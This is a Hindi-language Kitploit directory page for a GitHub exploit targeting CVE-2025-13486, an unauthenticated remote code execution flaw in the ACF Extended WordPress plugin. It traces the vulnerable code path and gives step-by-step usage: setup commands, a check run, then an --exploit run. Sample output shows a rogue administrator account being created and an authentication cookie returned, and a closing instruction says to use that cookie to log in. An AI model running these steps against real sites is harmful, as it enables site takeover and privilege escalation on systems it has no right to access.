Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-13486 — CVE-2025-13486 - दूरस्थ कोड निष्पादन और विशेषाधिकार वृद्धि एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/whattheslime/cve-2025-13486
विशेषाधिकार वृद्धिभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubwhattheslime/cve-2025-13486

CVE-2025-13486

CVE-2025-13486 - दूरस्थ कोड निष्पादन और विशेषाधिकार वृद्धि एक्सप्लॉइट

रिपॉजिटरी देखें
118 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-13486 एक्सप्लॉइट

ACF Extended WordPress प्लगइन — रिमोट कोड निष्पादन और विशेषाधिकार वृद्धि

Marcin Dudek (dudekmar) द्वारा खोजे गए CVE-2025-13486 के लिए एक्सप्लॉइट

⚠️ अस्वीकरण

यह रिपॉजिटरी केवल अनुसंधान और रक्षात्मक सुरक्षा उद्देश्यों के लिए प्रदान की गई है। लेखक इस जानकारी के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।


📌 अवलोकन

WordPress के लिए Advanced Custom Fields: Extended (ACFE) प्लगइन, संस्करण 0.9.0.5 से 0.9.1.1 में रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील है।

यह भेद्यता prepare_form() फ़ंक्शन में मौजूद है, जो उपयोगकर्ता-नियंत्रित इनपुट को स्वीकार करता है और उसे बिना उचित सत्यापन के call_user_func_array() को भेज देता है।

यह बिना प्रमाणीकरण वाले हमलावरों को सर्वर पर सीमित तरीके से मनमाना PHP कोड निष्पादित करने की अनुमति देता है, जो फिर भी एक व्यवस्थापक खाता बनाने और लॉग इन करने के लिए पर्याप्त है।


🔬 मूल कारण विश्लेषण

भेद्यता श्रृंखला इस प्रकार है:

  1. includes/modules/form/module-form-front.php:24 -> wp_ajax_nopriv_acfe/form/render_form_ajax एक्शन render_form_ajax हैंडलर को ट्रिगर करता है।

  2. includes/modules/form/module-form-front.php:492 -> फ़िल्टर acfe/form/prepare_form लागू होता है, जो prepare_form() फ़ंक्शन को कॉल करता है।

  3. includes/modules/form/module-form-front-render.php:151 -> उपयोगकर्ता-नियंत्रित $form डेटा सीधे call_user_func_array() को पास किया जाता है।


🎯 एक्सप्लॉइटेशन

  1. Python निर्भरताएँ स्थापित करें:

    root@kitploit:~
    python3 -m venv venv
    venv/bin/pip install -r requirements.txt
    
  2. एक संवेदनशील WordPress लक्ष्य की पहचान करें।

    लक्ष्य में ACFE-जनित फॉर्म वाला एक पेज होना चाहिए।

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2
    

    आउटपुट उदाहरण:

    root@kitploit:~
    [2025-12-19] [11:00:46] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:03:30] [info] Use `--exploit` to perform exploitation.
    
  3. स्क्रिप्ट को --exploit फ़्लैग के साथ फिर से चलाएँ:

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2 --exploit
    

    आउटपुट उदाहरण:

    root@kitploit:~
    [2025-12-19] [11:00:13] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:00:13] [success] ACFE nonce found: c5d75e0d16
    [2025-12-19] [11:00:14] [success] Account created: adm1n:2c5c87a94a2c5c87a94a (administrator)
    [2025-12-19] [11:00:14] [success] Authentication succeded!
    [2025-12-19] [11:00:14] [info] Cookie: wordpress_4411def9d576984c8d78253236b2a62f=adm1n%7C1766311214%7CwVDbFsbQpjYMM6ckgEQ6gwr6dcjIRhmqYed7Y46YqHJ%7C2f7857614d5ebe1216922dab79c3a8be7164cccde0869e1545f3bfb17c5d2859
    

📚 संदर्भ

  • https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended/advanced-custom-fields-extended-0905-0911-unauthenticated-remote-code-execution-in-prepare-form
  • https://sploitus.com/exploit?id=13551590-2822-5E83-9737-F55F4B2F9F82
टूल डाउनलोड करें
  • नव निर्मित व्यवस्थापक खाते में लॉग इन करने के लिए लौटाई गई WordPress प्रमाणीकरण कुकी का उपयोग करें।